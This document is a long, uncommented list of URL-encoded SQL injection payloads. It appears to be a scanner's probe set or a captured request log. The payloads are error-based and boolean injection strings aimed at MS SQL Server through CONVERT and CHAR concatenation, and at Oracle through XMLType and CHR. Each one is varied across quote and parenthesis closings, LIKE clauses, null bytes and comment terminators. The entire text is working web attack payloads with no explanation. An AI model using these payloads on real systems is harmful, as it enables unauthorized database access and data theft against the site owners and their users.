-6405%27%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27FhNn%27%20LIKE%20%27FhNn -9282%22%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22vpRq%22%3D%22vpRq -5308%22%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22KHKw%22%3D%22KHKw -2075%22%29%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22GZpt%22%3D%22GZpt -3990%22%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22DsCH%22%3D%22DsCH -6125%22%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22rONd%22%20LIKE%20%22rONd -4480%22%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22roTn%22%20LIKE%20%22roTn -1126%22%29%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22dluO%22%20LIKE%20%22dluO -6053%22%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22ocFm%22%20LIKE%20%22ocFm -9755%25%27%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -8112%25%27%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -2482%25%27%29%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -1019%25%27%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 -7900%00%27%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27XWGK%27%3D%27XWGK -9225%00%27%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27vBna%27%3D%27vBna -3278%27%29%20WHERE%209830%3D9830%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -4352%22%29%20WHERE%208731%3D8731%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -4044%29%20WHERE%205932%3D5932%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -1808%27%20WHERE%208948%3D8948%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -4405%22%20WHERE%206192%3D6192%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -6418%20WHERE%208490%3D8490%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -7479%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -2569%27%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -3380%27%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -2200%22%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -5458%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%282074%3D2074 -7906%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%287855%3D7855 -1651%29%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%282210%3D2210 -9651%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -8265%27%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27NYbM%27%3D%27NYbM -3037%27%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27JBZj%27%3D%27JBZj -4832%27%29%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27cNlX%27%3D%27cNlX -7003%27%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27UDpw%27%3D%27UDpw -6719%27%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27PeVk%27%20LIKE%20%27PeVk -3131%27%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27Zani%27%20LIKE%20%27Zani -3582%27%29%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27PEnw%27%20LIKE%20%27PEnw -6443%27%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27EFVz%27%20LIKE%20%27EFVz -2625%22%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22UaHr%22%3D%22UaHr -8207%22%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22sMIF%22%3D%22sMIF -8626%22%29%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22yJkk%22%3D%22yJkk -8008%22%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22AEFH%22%3D%22AEFH -9071%22%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%22CmHp%22%20LIKE%20%22CmHp -4756%22%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22NlFu%22%20LIKE%20%22NlFu -9784%22%29%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22tpdY%22%20LIKE%20%22tpdY -6413%22%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%22jRVq%22%20LIKE%20%22jRVq -1627%25%27%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -4853%25%27%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -8967%25%27%29%29%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -3046%25%27%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 -7726%00%27%29%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27lJke%27%3D%27lJke -6643%00%27%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27CsMe%27%3D%27CsMe -5814%27%29%20WHERE%206551%3D6551%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -8643%22%29%20WHERE%206622%3D6622%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -7521%29%20WHERE%205695%3D5695%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -4281%27%20WHERE%203599%3D3599%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -9389%22%20WHERE%206591%3D6591%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -5424%20WHERE%207716%3D7716%20OR%206021%20IN%20%28%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286021%3D6021%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20--%20 -7300%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -5385%27%29%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -5170%27%20OR%203646%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283646%3D3646%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 